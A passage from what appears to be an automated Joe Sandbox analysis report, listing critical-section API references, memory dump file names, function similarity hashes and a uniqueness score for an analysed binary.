                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B766A8
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B7670E
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B76746
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 9979cd5ed731568b13539186ea3518a8a98ecc2790f47b203994b14d74dd417f
                                                                                                                    • Instruction ID: 0e12292d2e9dfa4336cc686f67fd170a3ec9de50ea21547cf096259ca00942dd
                                                                                                                    • Opcode Fuzzy Hash: 9979cd5ed731568b13539186ea3518a8a98ecc2790f47b203994b14d74dd417f
                                                                                                                    • Instruction Fuzzy Hash: 01612675204B018FC765DF24C484A6BB3E1FF98354F608AADE8AE87295EB30ED45CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%